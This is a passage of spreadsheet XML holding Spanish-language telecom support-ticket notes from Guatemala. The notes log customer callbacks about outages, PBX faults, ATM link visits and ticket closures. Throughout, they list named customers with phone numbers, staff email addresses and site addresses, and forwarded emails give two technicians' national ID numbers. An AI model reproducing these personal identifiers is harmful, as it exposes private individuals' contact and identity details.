NÚMERO: 42735681
DURACIÓN: 0:00:27
ESTADO: MARCANDO
DETALLES: 42735681
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 20/06/2022 09:07:25</t>
  </si>
  <si>
    <t>F4608482</t>
  </si>
  <si>
    <t xml:space="preserve">
SE CONSULTA A PERSONAL DE BANCO AZTECA SOBRE EL ESTADO DE ELA AGENCIA</t>
  </si>
  <si>
    <t>F4608483</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERWIN CHAVEZ AL 53114812 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001123091
**</t>
  </si>
  <si>
    <t>F4608484</t>
  </si>
  <si>
    <t>F4608493</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO MARTINEZ 77414213 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001172452</t>
  </si>
  <si>
    <t>CLIENTE FRANCISCO MARTINEZ 71689849 UBICA EQUIPO ASMI52 ALARMADO, PROCEDE A REINICIARLO PERO INCONVENIENTE PERSISTE. SE ABRIRÁ WO PARA REVISION
ID DE LLAMADA: 1001124347</t>
  </si>
  <si>
    <t>F4608494</t>
  </si>
  <si>
    <t>SE LLAMA CLIENTE WALTER REYES 45787911 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001140149</t>
  </si>
  <si>
    <t>F4608499</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS ORTIZ 70696529 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001496288</t>
  </si>
  <si>
    <t>F4608516</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EDWAR ALVIZUREZ 30167645  MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
CLIENTE MENCIONA QUE EN PR PRESENTARON PROBLEMAS DE ENERGIA
-ID 1001143556</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWAR ALVIZUREZ 30167645 MENCIONA QUE VALIDARA CON PR POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 1001139633</t>
  </si>
  <si>
    <t>F4608520</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE YOSELIN - 42379251  SE BRINDA RETROALIMENTACION **
-ID 1001223572
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR YOSELIN - 42379251 NO RESPONDE ENVIA A BUZON  || SE INTENTARA LUEGO **
-ID 1001189543
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR YOSELIN - 42379251 CONTESTAN PERO CORTAN LLAMADA || SE INTENTARA LUEGO **
-ID 1001167458
**</t>
  </si>
  <si>
    <t>SE LLAMA A PR YOSELIN - 42379251 NO RESPONDE, ENVIA A BUZON
-ID 1001154655 - 1001154818</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR RIOS  40422160 MENCIONA QUE SE HABIA CONFUNDIDO DE NUMERO POR LO QUE BRINDA OTRO CONTACTO  YOSELIN - 42379251
-ID 1001152352</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  VICTOR RIOS 58064113 - 40422160 QUIEN BRINDA OTRO CONTACTO DE PR - 49881196
-ID 1001147653 - 1001147843</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR RIOS 58064113 MENCIONA QUE ESTARA VALIDANDO CON PR POR LO QUE SOLICITA LLAMDA EN 10 MIN
-ID 1001130107</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR RIOS 40422160 MENCIONA QUE BUSCARA OTRO CONTACTO DE PR
-ID 1001137760</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR  - 53493906 PERO NO RESPONDE
-ID 1001136943 - 1001137191</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  PR - 49881196 MENCIONA QUE ES DE LA DIRECCION  (INTERIOR DEL HOSPITAL ZONA 10 DE HUEHUETENANGO)
-ID 1001148679</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR RIOS 58064113 QUIEN CONFIRMA EL NUMERO DE PR  - 53493906
CLIENTE SOLICITA SE PUEDA LLAMAR EN 5 MIN PARA QUE PUEDAN NOTIFICAR
-ID 1001134613</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YOSELIN - 42379251 MENCIONA QUE YA APLICARON REINCIO PERO EL INCONVENIENTE PERSISTE
-ID 1001193256
NOMBRE DEL CLIENTE: MINISTERIO PUBLICO
UBICACIÓN:2 CALLE 3-54 COLONIA HERNANDEZ ZONA 8, HUEHUETENANGO
CONTACTO EN SITIO:  YOSELIN - 42379251
HORARIO DE ATENCION:8:00 - 16:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4608521</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARY DIAZ 30196810 - 79378500 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
SE LE BRINDA DIAGNOSTICO DE UPS CON DAÑO
-ID 1001250527 - 1001251048 - 1001251245</t>
  </si>
  <si>
    <t>###SE QUEDA PROGRAMADA LA VISITA PARA LAS 13:00 PM  CON CLIENTE###</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARY DIAZ 30196810 MENCIONA QUE LO QUE SOLICITO ES EL CAMBIO DEL EQUIPO CISCO
-ID 1001131995
NOMBRE DEL CLIENTE: CORPORACION DOS MUNDOS S.A.
UBICACIÓN:CALLE PRINCIPAL 8340 ALDEA LA CURBINA ZONA 0 PLAYA, CHIQUIMULILLA SANTA ROSA
CONTACTO EN SITIO: MARY DIAZ  30196810
HORARIO DE ATENCION:9:00 - 20:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARY  DIAZ 30196810 - 79378500 PARA BRINDAR RETROALIMENTACION, CLIENTE CONFIRMA QUE QUE ESTA EN PR HASTA LAS 20:00 HRS
-ID 1001141515 - 1001142087</t>
  </si>
  <si>
    <t>F4608522</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRYAN ALVIZUREZ 42617499 PERO NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO**
-ID 1001204505
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRYAN ALVIZUREZ 42617499 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001196915 - 1001197155</t>
  </si>
  <si>
    <t>F4608523</t>
  </si>
  <si>
    <t>SE LLAMA  CLIENTE 32929643 PERO NO RESPONDE
-ID 1001167070</t>
  </si>
  <si>
    <t>SE LLAMA AL NUMERO 32929643 CONTESTA UNA SEÑORTA SE INTENTA TRANSFERIR LLAMADA POR MOTIVOS DE INTERFERENCIA EN LLAMADA PERO CORTA-
32929643</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 25164018 - 32929643 NO RESPONDE SE INTENTARA LUEGO
-ID 100161005 - 1001161107 - 1001161609</t>
  </si>
  <si>
    <t>F4608527</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALFREDO REYES AL 40486947 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001161947
**</t>
  </si>
  <si>
    <t>F4608543</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DOUGLAS FERNANDO SERPAS-78269485  || SE TIEENE EN LINEA ##
1001136045
COLA:
NOMBRE: A: 0050378269485
NÚMERO: 0050378269485
DURACIÓN: 0:00:35
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378269485
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 20/06/2022 09:21:47
1001136240
COLA:
NOMBRE: A: 0050378269485
NÚMERO: 0050378269485
DURACIÓN: 0:00:16
ESTADO: CONECTADA
DETALLES: 0050378269485
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 20/06/2022 09:21:54</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE  JOSE ROSALES.-61584100
1001138770
COLA:
NOMBRE: A: 0050361584100
NÚMERO: 0050361584100
DURACIÓN: 0:00:17
ESTADO: CONECTADA
DETALLES: 0050361584100
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 20/06/2022 09:29:51</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, INICA QUE SE LLAME A JOSE ROSALES.-61584100</t>
  </si>
  <si>
    <t>F4608546</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE LUIS MIRANDA AL 82377124 INDICA QUE ESTARA REVISANDO INTERNAMENTE YA QUE EL PROBLEMA AL PARECER ES INTERNO NO NUESTRO Y CUALQUIER DUDA EL SE VOLVERA A COMUNICAR AUTORIZA CIERRE DEL TICKET**
-ID 1001146165
**</t>
  </si>
  <si>
    <t>F4608559</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE SRTA.  BLANCA MORALES 22554500 INFORMA QUE EL ENLACE SE CAE Y LEVANTA, SE VALIDA ESTADO DE LOS ETX-1 Y SE OBSERVA REINICIO EN EL ETX-1 NODO LO QUE CONFIRMA LO QUE MENCIONA CLIENTE, SE LE INFORMA QUE REVISAREMOS FISICAMENTE DEL LADO DEL NODO Y DE SER NECESARIO SE VISITARA EL PUNTO REMOTO, ES NECESARIO GESTION DE PERMISOS PARA EL PUNTO REMOTO.</t>
  </si>
  <si>
    <t>F4608562</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SR. LUIS RODRIGUEZ 78843777 NO CONTESTA IVR ENVIA A BUZON, ID: 1001981316.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS RODRIGUEZ AL 78843777 INDICA QUE EL ENVIO CORREO DETALLANDO EL PROBLEMA YA QUE ES CON ALGUNOS DOMINIOS QUE NO LE PEMITE ENVIAR NI RECIBIR CORREOS || SE NOTIFICA A  GESTOR **
-ID 1001152263
**</t>
  </si>
  <si>
    <t>F4608563</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTOFER ARANA 58596156 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001144508</t>
  </si>
  <si>
    <t>F4608565</t>
  </si>
  <si>
    <t>F4608570</t>
  </si>
  <si>
    <t>CLIENTE EDGAR QUINTEROS REALIZA CAMBIO A 1000 FD Y TAMBIEN SE VUELVE A FORZAR EN EL CTC, EQUIPO DEL CLIENTE YA RESPONDE ESTABLE A NIVEL DE PING. PBX SE REGISTRA Y LLAMADAS ENTRANTES COMPLENTAN. CLIENTE SOLICITA 30 MINUTOS PARA PODER HACER PRUEBAS.
1001154546
COLA:
NOMBRE: A: 57084834
NÚMERO: 011 50257084834
DURACIÓN: 0:06:25
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: +50257084834
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 20/06/2022 10:20:20</t>
  </si>
  <si>
    <t>PBX DEL CLIENTE SIGUE CON PERDIDAS, CLIENTE  EDGAR QUINTEROS INDICA QUE SIGUE REALIZANDO PRUEBAS CON SU PBX, Y QUE LE SOLICITARON CAMBIARA SU PROXY. SE CONTACTARÁ EN 30 MINUTOS.
1001173226
COLA:
NOMBRE: A: 57084834
NÚMERO: 011 50257084834
DURACIÓN: 0:00:58
ESTADO: CONECTADA
DETALLES: +50257084834
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 20/06/2022 11:05:22</t>
  </si>
  <si>
    <t>F4608574</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ROSIDALVI CALERO AL 82994889 INDICA QUE YA REINICIO LOS EQUIPOS Y NO LEVANTA SE SOLICITAN DATOS DE VISITA **
HORARIO DE ATENCION: 8:00 A 16:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: KM 163.5 CARRETERA PANAMERICANA VIA 15 DE JULIO
ATENDERA EN SITIO:  ROSIDALVI CALERO
-ID 1001155940
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROSIDALVI CALERO  AL 82994889 SE BRINDA RETROALIMENTACION **
ID 1001183564
**</t>
  </si>
  <si>
    <t>F4608580</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS FUNEZ 70655316 - 70001261 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001150090 - 1001150320</t>
  </si>
  <si>
    <t>F4608603</t>
  </si>
  <si>
    <t xml:space="preserve">
SE LLAMA A CENTRAL DEL CLIENTE, SIN EMBARGO NO SE LOGRA COMUNICACION
NADIE RESPONDE
1001261416
COLA:
NOMBRE: A: BANRURAL -
NÚMERO: 25041690
DURACIÓN: 0:01:06
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 25041690
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: BARBARAAPARICIO
FECHA Y HORA LOCALES: 20/06/2022 15:34:40</t>
  </si>
  <si>
    <t>SE LLAMA A LA AGENCIA A LAS EXTENSIONES PERO NO ESTAN DISPONIBLES
1001147494
COLA:
NOMBRE: A: 25041515
NÚMERO: 25041515
DURACIÓN: 0:00:34
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 25041515
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 20/06/2022 09:55:12
1001147838
COLA:
NOMBRE: A: 25041515
NÚMERO: 25041515
DURACIÓN: 0:00:21
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 25041515
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 20/06/2022 09:55:49</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A LA CENTRAL SIN EMBARGO NO SE TIENE RESPUESTA  SE REENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
JUE 23/06/2022 12:13 P.M.
PARA:
CARLOS FELIPE VELASQUEZ CRISTAL;
TIC-TELE-TEC@BANRURAL.COM.GT;
TIC-TELECOM@BANRURAL.COM.GT;
MONITOREOBDR@CYBERSEG.COM;
TIC-CALLCENTER@BANRURAL.COM.GT;
MONITOREO.ENLACES@BANRURAL.COM.GT;
CC:
CNOCCA;
FONSECA BUSTAMANTE, KEVYN ANTONIO;
CLIENTESCORPORATIVOS;
JOSE RODOLFO ESTRADA MUÑOZ;
BUEN DIA, ESTIMADOS:
    ¿RESPECTO AL ENLACE QUE SE HACE MENCION ANTERIORMENTE, PODRÍAN CONFIRMARNOS LOS AVANCES DEL ENLACE O BIEN INDICARNOS LOS CONTACTOS DEL PUNTO REMOTO,
QUEDAMOS A LA ESPERA DE SU PRONTA RESPUESTA.</t>
  </si>
  <si>
    <t>F4608609</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 24207212 CONTESTA EL SEÑOR  HECTOR INDICA QUE VA A TRANSFERIR LLAMADA PERO NO RESPONDEN Y SE CORTA LLAMADA SE INTENTA NUEVAMENTE Y NO RESPONDEN **
-ID 1001240146 - 1001241077
**</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL MENCIONA QUE YA COORDINARON CON PERSONAL DEL BANCO Y LA VISITA ESTA PARA LAS 10:00
CLIENTE INDICA QUE SI TUVIESEN PROBLEMAS CON EL ACCESO, POR FAVOR CONTACTARSE CON CENTRAL PARA VALIDAR LOS PERMISOS
-ID 3001684363 - 3001684455 - 3001684693</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GALINDO AL 2420¿7200 EXT 2345 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001719171
**</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA QUE REVISE INTERNAMENTE CON EL BANCO Y SE INDICA POR LLAMADA ADICIONALMENTE##
3001722682
COLA:
NOMBRE: A: 24207200
NÚMERO: 24207200
DURACIÓN: 0:02:08
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24207200
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 4/07/2022 11:57:37
SE PROCEDE A CIERRE DEL TICKET
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: LUNES, 4 DE JULIO DE 2022 11:57
PARA: LUIS GALINDO &lt;LGALINDO@5B.COM.GT&gt;; ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;
CC: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; ERWIN CHOQUIN &lt;ECHOQUIN@5B.COM.GT&gt;; DIAZ GARCIA, KATERINE FABIOLA &lt;KATERINE.DIAZ@CLARO.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CARLOS SOSA &lt;CSOSA@5B.COM.GT&gt;; LUIS BOSARREYES &lt;LBOSARREYES@5B.COM.GT&gt;; SUPERVISORES OSI &lt;SUPERVISORES_OSI@5B.COM.GT&gt;; BRENDA MARISOL DE PAZ PEREZ &lt;BRENDA.DEPAZ@CLARO.COM.GT&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;
ASUNTO: RE: [SOLICITUD :##RE-766335##] : RE: SOLICITUD DE ACCESOS || CC_TYT_GT_ATM1438 || F4608609 ||
BUEN DÍA ESTIMADOS.
SE REALIZO LA VISITA EL DÍA DE HOY Y EL PERSONAL TÉCNICO VERIFICO QUE HAY UN DAÑO EN EL COBRE PERO PROVINE INTERNAMENTE DEL RACK CENTRAL DEL BANCO BANRURAL. PARA QUE PUEDAN VALIDAR CON ELLOS INTERNAMENTE.
PROCEDEMOS AL CIERRE DE TICKET POR PARTE NUESTRA Y ESTAMOS SIEMPRE PARA SERVIRLES.
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>###SE REVISA COLA DE CORREOS SIN AVANCES POR PARTE DEL CLIENTE##
 [SOLICITUD :##RE-766335##] : RE: SOLICITUD DE ACCESOS || CC_TYT_GT_ATM1438 || F4608609 ||</t>
  </si>
  <si>
    <t>###SE REENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS ##
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: LUNES, 4 DE JULIO DE 2022 9:23
PARA: ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;; LUIS GALINDO &lt;LGALINDO@5B.COM.GT&gt;
CC: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; ERWIN CHOQUIN &lt;ECHOQUIN@5B.COM.GT&gt;; DIAZ GARCIA, KATERINE FABIOLA &lt;KATERINE.DIAZ@CLARO.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CARLOS SOSA &lt;CSOSA@5B.COM.GT&gt;; LUIS BOSARREYES &lt;LBOSARREYES@5B.COM.GT&gt;; SUPERVISORES OSI &lt;SUPERVISORES_OSI@5B.COM.GT&gt;; BRENDA MARISOL DE PAZ PEREZ &lt;BRENDA.DEPAZ@CLARO.COM.GT&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;
ASUNTO: RE: [SOLICITUD :##RE-766335##] : RE: SOLICITUD DE ACCESOS || CC_TYT_GT_ATM1438 || F4608609 ||
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL SERVICIO ATM1438, ADJUNTO LOS DATOS DEL PERSONAL TÉCNICO DE CLARO ASIGNADO A LA VISITA PARA EL DÍA LUNES 04/07 A PARTIR DE LAS 10:00 HRS
LUIS MEJIA 659736                                             DPI  1874 43165 1705
ZEPEDA REYES FRANCISCO JAVIER 790442    DPI: 2569023051705
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A CLIENTE CON LOS DATOS DEL TECNICO SOLICITANDO LA VISITA PARA EL LUNES A LAS 10 HRS || PENDIENTE CONFIRMEN
ASUNTO: RE: [SOLICITUD :##RE-766335##] : RE: SOLICITUD DE ACCESOS || CC_TYT_GT_ATM1438 || F4608609 ||
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL SERVICIO ATM1438, ADJUNTO LOS DATOS DEL PERSONAL TÉCNICO DE CLARO ASIGNADO A LA VISITA PARA EL DÍA LUNES 04/07 A PARTIR DE LAS 10:00 HRS
LUIS MEJIA 659736   DPI  1874 43165 1705
ZEPEDA REYES FRANCISCO JAVIER 790442 DPI: 2569023051705
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS COORDIALES.</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA COORDINAR LA VISITA PARA EL LUNES 04/07/2022 A LAS 10 AM###
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 1 DE JULIO DE 2022 7:37
PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; LGALINDO@5B.COM.GT &lt;LGALINDO@5B.COM.GT&gt;
CC: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; ECHOQUIN@5B.COM.GT &lt;ECHOQUIN@5B.COM.GT&gt;; DIAZ GARCIA, KATERINE FABIOLA &lt;KATERINE.DIAZ@CLARO.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CSOSA@5B.COM.GT &lt;CSOSA@5B.COM.GT&gt;; LBOSARREYES@5B.COM.GT &lt;LBOSARREYES@5B.COM.GT&gt;; SUPERVISORES_OSI@5B.COM.GT &lt;SUPERVISORES_OSI@5B.COM.GT&gt;; BRENDA MARISOL DE PAZ PEREZ &lt;BRENDA.DEPAZ@CLARO.COM.GT&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;
ASUNTO: RE: [SOLICITUD :##RE-766335##] : RE: SOLICITUD DE ACCESOS || CC_TYT_GT_ATM1438 || F4608609 ||
MUY BUEN DÍA ESTIMADOS.
COORDINAREMOS LA VISITA PARA EL DÍA LUNES 04/07/2022 A LAS 10 AM PARA QUE PUEDAN APOYARNOS CON EL PERSONAL QUE ATIENDA A LOS TÉCNICOS.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO AUN NO SE TIENE RESPUESTA DEL CLIENTE
ASUNTO: RE: SOLICITUD DE ACCESOS || CC_TYT_GT_ATM1438 || F4608609 ||</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO AUN NO SE TIENE RESPUESTA DEL CLIENTE
SOLICITUD DE ACCESOS || CC_TYT_GT_ATM1438 || F4608609 ||</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MENCIONA QUE ESTAN A LA ESPERA DE QUE CONFIRME LOS ACCESOS
-ID 1001372660</t>
  </si>
  <si>
    <t>F4608626</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24903000 MENCIONA QUE ESTE SERVICIO SE DIO DE BAJA EN AGOSTO DEL AÑO PASADO PERO NUNCA LLEGARON A RECOGER LOS EQUIPOS
SE NOTIFICARA PARA VALIDAR LA INFORMACION
-ID 1001173485</t>
  </si>
  <si>
    <t>F4608628</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN SALAZAR-79888090 SE TIENE EN LINEA ##VIVO</t>
  </si>
  <si>
    <t>CLIENTE INDICIA QU E NO TIENE LLAMADAS ENTRANTES, NI SALIENTES NI ENTRE EXTENSIONES- ##CLIENTE APLICA RESET Y SERVICIO RESTABLECE ##VALIDA ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMMA A LCIENTE EVELYN SALAZAR-79888090 ##</t>
  </si>
  <si>
    <t>SE HABLA CON  EJECUTIVA  ASTRID 78602608  QUIEN NOS CONFIRMA QUE A CLIENTE YA LE REMOVIERON AVI ## SE PROCEDE A REALIZAR PRUEBAS DEL LADO DEL CLIENTE ##
RESULTADO: LLAMADA HECHA
NOMBRE: 0050378269485
NÚMERO: 0050378269485
INICIO: HOY, 09:21
FIN: HOY, 09:23
DURACIÓN: 1:45
ID DE LLAMADA: 1001136240</t>
  </si>
  <si>
    <t>F4608648</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GABRIEL GARCIA / 84097915 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001165321
**</t>
  </si>
  <si>
    <t>F4608659</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RICARDO 78734015 RESPONDE RUDI SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001181922</t>
  </si>
  <si>
    <t>F4608676</t>
  </si>
  <si>
    <t>LUIS PINEDA/  58778927 ACTUALMENTE EN LLAMADA ...</t>
  </si>
  <si>
    <t>SR. LUIS PINEDA/  58778927 INFORMA QUE ESTAN ORDENANDO LA RED INTERNA YA QUE RECIENTEMENTE INGRESO A LA EMPRESA Y ESTA MAPEANDO LA RED PERO SE TOPO CON EL INCONVENIENTE DE QUE HAY 2 REDES PROPORCIONANDO DHCP LOS CUALES ESTAN HACIENDO CONFLICTO Y SACANDO BOTANTO LA CONFIGURACION DE LOS EQUIPOS INTERNOS, ACTUALMENTE YA SE RETIRO DEL SITIO PERO INDICA QUE MAÑANA LO PODEMOS LLAMAR DESDE LAS 8:00 AM PARA APOYARLE A IDENTIFICAR LOS EQUIPOS Y CUAL ESTA PROCOCANDO EL CONFLICTO DHCP.</t>
  </si>
  <si>
    <t>F4608683</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CAROLINA PEÑATE AL 60623638  SE BRINDA RETROALIMENTACION **
-ID 1001237519
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CAROLINA PEÑATE AL 60623638  - 77786695 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001201311 - 1001201793
**</t>
  </si>
  <si>
    <t>F4608690</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MOISES CASTRO QUIEN VALIDA Y AUTORIZA EL CIERRE.
1001284585
COLA:
NOMBRE: A: 0050495959558
NÚMERO: 0050495959558
DURACIÓN: 0:00:07
ESTADO: MARCANDO
DETALLES: 0050495959558
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/06/2022 16:49:01</t>
  </si>
  <si>
    <t>F4608692</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AGENTE CAMPOS  AL 26652920 SE BRINDA RETROALIMENTACION **
-ID 1001184685
**</t>
  </si>
  <si>
    <t>F4608696</t>
  </si>
  <si>
    <t>**SELLAMA A CLIENTE CARLOS RIOS AL 22749938 INDICA QUE ES MUY INESTABLE EL SERVICIO QUE POR RATOS SE LE CAE TAMBIEN CONSULTA SI SE LE PUEDE AYUDAR CON UN EQUIPO SOFOS  QUE TIENE CON LA CONFIGURACION Y SOLICITA QUE SE LE LLAME DE 13:30 A 14:00  HRS || SE NOTIFICA A GESTOR **
-ID 1001195160
**
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS RIOS 22749938 SE DEJA EN CONFERENCIA CON GESTOR
-ID 10001241547</t>
  </si>
  <si>
    <t>F4608699</t>
  </si>
  <si>
    <t>F4608702 || CAÍDA TOTAL || ATN 910C PENA BLANCA CELDA PNB_01 CSCYHNPBN1R1A2 || 10.123.31.17 || MASIVO_HN ||</t>
  </si>
  <si>
    <t>F4608706</t>
  </si>
  <si>
